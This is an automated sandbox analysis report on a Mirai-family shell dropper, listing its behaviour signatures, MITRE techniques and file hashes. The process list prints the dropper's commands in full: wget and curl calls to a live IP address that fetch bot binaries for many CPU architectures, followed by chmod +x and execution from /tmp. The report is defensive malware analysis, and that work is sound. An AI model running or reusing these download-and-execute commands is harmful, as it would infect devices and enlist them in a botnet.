Analysis
-
max time kernel
149s -
max time network
160s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
-
submitted
27/03/2025, 12:13
General
-
Target
ohsitsvegawellrip.sh
-
Size
3KB
-
MD5
bd5e291801c56bce037d4222db8048a8
-
SHA1
604dbdedf1611a4e40546cb19455c5d49bdd2537
-
SHA256
75c2685fac6f7d0eb80f04d174e8977d0363398e9c2852b1939d9951606331c5
-
SHA512
5cfc3d4e72d492e24418106f2713525e544be0bd47342f59ce7d3beba59f59a2540bfab00b6a219df644840911bf4144cabcc4111b989afdbd7b1e520e2ffa07
Score
10/10
Malware Config
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
Contacts a large (14718) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 15 IoCs
-
Modifies Watchdog functionality 1 TTPs 24 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates active TCP sockets 1 TTPs 11 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Reads process memory 1 TTPs 20 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
-
Changes its process name 12 IoCs
-
Checks CPU configuration 1 TTPs 15 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads system network configuration 1 TTPs 11 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 30 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/ohsitsvegawellrip.sh/tmp/ohsitsvegawellrip.sh1⤵
- Executes dropped EXE
- System Network Configuration Discovery
- Writes file to tmp directory
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.x862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat k03ldc.x862⤵
-
-
/bin/chmodchmod +x k03ldc.x86 loudscream ohsitsvegawellrip.sh systemd-private-2ca27ba681bb4d4f8537aa7ba94dc411-systemd-timedated.service-5SFM172⤵
- File and Directory Permissions Modification
-
-
/tmp/loudscream./loudscream .x862⤵
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc2⤵
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/catcat k03ldc.mips2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod +x k03ldc.mips k03ldc.x86 loudscream ohsitsvegawellrip.sh systemd-private-2ca27ba681bb4d4f8537aa7ba94dc411-systemd-timedated.service-5SFM172⤵
- File and Directory Permissions Modification
-
-
/tmp/loudscream./loudscream .mips2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.mpsl2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat k03ldc.mpsl2⤵
-
-
/bin/chmodchmod +x k03ldc.mips k03ldc.mpsl k03ldc.x86 loudscream ohsitsvegawellrip.sh systemd-private-2ca27ba681bb4d4f8537aa7ba94dc411-systemd-timedated.service-5SFM172⤵
- File and Directory Permissions Modification
-
-
/tmp/loudscream./loudscream .mpsl2⤵
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.arm2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat k03ldc.arm2⤵
-
-
/bin/chmodchmod +x k03ldc.arm k03ldc.mips k03ldc.mpsl k03ldc.x86 loudscream ohsitsvegawellrip.sh systemd-private-2ca27ba681bb4d4f8537aa7ba94dc411-systemd-timedated.service-5SFM172⤵
- File and Directory Permissions Modification
-
-
/tmp/loudscream./loudscream .arm2⤵
- Modifies Watchdog functionality
- Changes its process name
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.arm52⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/chmodchmod +x k03ldc.arm k03ldc.arm5 k03ldc.mips k03ldc.mpsl k03ldc.x86 loudscream ohsitsvegawellrip.sh systemd-private-2ca27ba681bb4d4f8537aa7ba94dc411-systemd-timedated.service-5SFM172⤵
- File and Directory Permissions Modification
-
-
/tmp/loudscream./loudscream .arm52⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.arm62⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/chmodchmod +x k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.mips k03ldc.mpsl k03ldc.x86 loudscream ohsitsvegawellrip.sh systemd-private-2ca27ba681bb4d4f8537aa7ba94dc411-systemd-timedated.service-5SFM172⤵
- File and Directory Permissions Modification
-
-
/tmp/loudscream./loudscream .arm62⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.arm72⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/chmodchmod +x k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.mips k03ldc.mpsl k03ldc.x86 loudscream ohsitsvegawellrip.sh systemd-private-2ca27ba681bb4d4f8537aa7ba94dc411-systemd-timedated.service-5SFM172⤵
- File and Directory Permissions Modification
-
-
/tmp/loudscream./loudscream .arm72⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.ppc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/chmodchmod +x k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.mips k03ldc.mpsl k03ldc.ppc k03ldc.x86 loudscream ohsitsvegawellrip.sh systemd-private-2ca27ba681bb4d4f8537aa7ba94dc411-systemd-timedated.service-5SFM172⤵
- File and Directory Permissions Modification
-
-
/tmp/loudscream./loudscream .ppc2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.m68k2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/chmodchmod +x k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.m68k k03ldc.mips k03ldc.mpsl k03ldc.ppc k03ldc.x86 loudscream ohsitsvegawellrip.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/loudscream./loudscream .m68k2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.sh42⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/chmodchmod +x k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.m68k k03ldc.mips k03ldc.mpsl k03ldc.ppc k03ldc.sh4 k03ldc.x86 loudscream ohsitsvegawellrip.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/loudscream./loudscream .sh42⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.spc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/chmodchmod +x k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.m68k k03ldc.mips k03ldc.mpsl k03ldc.ppc k03ldc.sh4 k03ldc.spc k03ldc.x86 loudscream ohsitsvegawellrip.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/loudscream./loudscream .spc2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.arc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/chmodchmod +x k03ldc.arc k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.m68k k03ldc.mips k03ldc.mpsl k03ldc.ppc k03ldc.sh4 k03ldc.spc k03ldc.x86 loudscream ohsitsvegawellrip.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/loudscream./loudscream .arc2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.x86_642⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/chmodchmod +x k03ldc.arc k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.m68k k03ldc.mips k03ldc.mpsl k03ldc.ppc k03ldc.sh4 k03ldc.spc k03ldc.x86 k03ldc.x86_64 loudscream ohsitsvegawellrip.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/loudscream./loudscream .x86_642⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.i6862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/chmodchmod +x k03ldc.arc k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.i686 k03ldc.m68k k03ldc.mips k03ldc.mpsl k03ldc.ppc k03ldc.sh4 k03ldc.spc k03ldc.x86 k03ldc.x86_64 loudscream ohsitsvegawellrip.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/loudscream./loudscream .i6862⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
-
-
/usr/bin/wgetwget http://196.251.86.49/bins/k03ldc.i4862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://196.251.86.49/bins/k03ldc.i4862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/chmodchmod +x k03ldc.arc k03ldc.arm k03ldc.arm5 k03ldc.arm6 k03ldc.arm7 k03ldc.i486 k03ldc.i686 k03ldc.m68k k03ldc.mips k03ldc.mpsl k03ldc.ppc k03ldc.sh4 k03ldc.spc k03ldc.x86 k03ldc.x86_64 loudscream ohsitsvegawellrip.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/loudscream./loudscream .i4862⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD524356e787f328a42cc9ea7ec243e9814
SHA1a3ef01ab629812d31fd18f35a0414a464e832f39
SHA256129a3f3ab60b25f8cc9ccb21136710f486cdf8269f0b3c67ef44f88cecd107ac
SHA5120a05e80260cbe65030dd70448d6951c4f9d6f8e1a3a47b33cf13c64a3dfdc302f6a50f5322cf094e167744dc2b29c03905d9386e4870069b59b5588396c0c5dd
-
Filesize
78KB
MD54ac71305f9f8e2f1d6a13ac33f003d02
SHA1b8c389354df8e07b3022212150ea5984b9903870
SHA2568f0b4107429b21c6994d052ee2b00024a43d11edb44bee6062176fcf46a16767
SHA5124f73a1c9806c157840b9109d9b575db765160c5e04293d241a321dcbfce9e506cb956d2645e790ef1d9b985ceb0a323bad60b7fbefc5b990b2ceaa4aed93d465
-
Filesize
78KB
MD5312227d16d63cec249f9641298f59e2a
SHA181286a7597155a401699d317ba0a18c218aab3f5
SHA25609f3b93891d420d9c1d71b598a31d2aec6491a9c291e5884dd2ee5d7a53ea17f
SHA5123351ce2709a7da9d0acf79e12e1cd77a37d62cf3a7c67750f7ec2e98db7395b2ce61c31981a4c9b6249ecd50cd71460368c88f2b1e931b284d3ff7ae3e3d72a6
-
Filesize
60KB
MD5c20c92ebd7cecdd6ef656f6d425e3242
SHA1951665501fc12de31efe77c51b12c7ac4610b9e7
SHA256be6cc74534d0cdfa641b204e51dd9bd23d00dbd41c1b4dbe23908198de459179
SHA5124a38d85572f2ae12c941d9c155131172c958307970c2d93d88c1ce836763bc9cf4e76a91c2de328921a077adaced95298684c4bffb87c2654a43ac255c93863f